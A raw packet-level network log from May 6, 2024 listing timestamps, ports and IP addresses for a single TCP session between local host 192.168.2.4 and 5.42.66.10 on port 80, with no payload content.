May 6, 2024 07:53:04.801386118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801395893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801412106 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801413059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801424026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801434994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801435947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801448107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801459074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801460028 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801471949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801472902 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801482916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801492929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801498890 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801507950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801520109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801525116 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801532030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801542044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801543951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801553965 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801556110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801582098 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801605940 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801680088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801692009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801702023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801713943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801718950 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801724911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801728964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801737070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801748037 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801748991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801759958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801770926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801776886 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801781893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801794052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801795006 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801805973 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801812887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801824093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801829100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801836014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801846981 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801847935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801858902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801868916 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801871061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801882029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801887035 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801892996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801904917 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801909924 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801917076 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801929951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801934004 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801940918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801950932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801953077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801964045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801966906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801975012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.801990986 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.801996946 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802007914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802017927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802018881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802031040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802031040 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802042007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802052975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802057028 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802064896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802083015 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802098989 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802119970 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802131891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802145004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802154064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802165031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802170992 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802177906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802181959 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802189112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802201033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802205086 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802212954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802225113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802231073 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802237988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802244902 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802249908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802261114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802272081 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802272081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802284956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802295923 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802295923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802308083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802308083 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802321911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802334070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802335024 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802345991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802357912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802360058 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802370071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802372932 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802385092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802400112 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802421093 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802434921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802448988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802459002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802469969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802472115 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802483082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802494049 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802495003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802505970 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802517891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802519083 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802529097 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802530050 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802541971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802553892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802558899 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802565098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802577019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802584887 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802587986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802599907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802608013 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802611113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802634001 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802645922 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802746058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802758932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802768946 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802781105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802788019 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802791119 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802803040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802813053 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802814007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802826881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802829981 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802838087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802848101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802850962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802860975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802872896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802876949 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802885056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802890062 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802896976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802907944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802917004 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802921057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802932024 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802937984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802942991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802954912 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802956104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802967072 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.802968025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802978992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802990913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.802993059 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803004026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803015947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803019047 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803026915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803031921 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803039074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803050995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803056955 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803062916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803075075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803082943 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803086996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803097963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803098917 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803111076 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803138971 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803220987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803231955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803242922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803255081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803258896 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803267002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803277969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803282976 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803289890 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803301096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803306103 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803312063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803319931 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803323030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803333044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803343058 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803344965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803354979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803366899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803369999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803378105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803388119 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803390026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803400993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803411007 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803412914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803426027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803436995 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803437948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803450108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803450108 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803472042 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803477049 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803486109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803498030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803499937 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803508997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803524971 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803529978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803541899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803550005 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803553104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803563118 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803565979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803577900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803590059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803591967 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803616047 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803632975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803664923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803677082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803689003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803699970 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803704023 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803710938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803715944 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803724051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803735018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803738117 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803745985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803759098 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803776979 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803813934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803823948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803834915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803845882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803850889 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803858042 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803868055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803873062 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803879976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803890944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803896904 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803904057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803915977 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803916931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803927898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803931952 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803940058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803952932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803955078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803977966 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803983927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.803992033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.803996086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804007053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804022074 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804022074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804030895 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804033995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804048061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804053068 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804059982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804070950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804075956 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804084063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804095030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804106951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804110050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804121971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804126024 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804133892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804136992 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804147005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804158926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804163933 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804171085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804182053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804187059 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804193974 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804203987 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804205894 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804224014 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804254055 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804290056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804301977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804312944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804323912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804325104 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804337978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804348946 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804353952 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804359913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804374933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804378986 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804385900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804389000 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804398060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804409981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804414034 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804420948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804433107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804438114 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804444075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804455996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804459095 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804476976 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804478884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804491043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804495096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804502010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804514885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804524899 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804526091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804537058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804538965 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804548979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804562092 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804586887 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804627895 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804641008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804651976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804663897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804672003 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804672003 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804676056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804687023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804688931 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.804698944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.804711103 CEST	80	49741	5.42.66.10	192.168.2.4
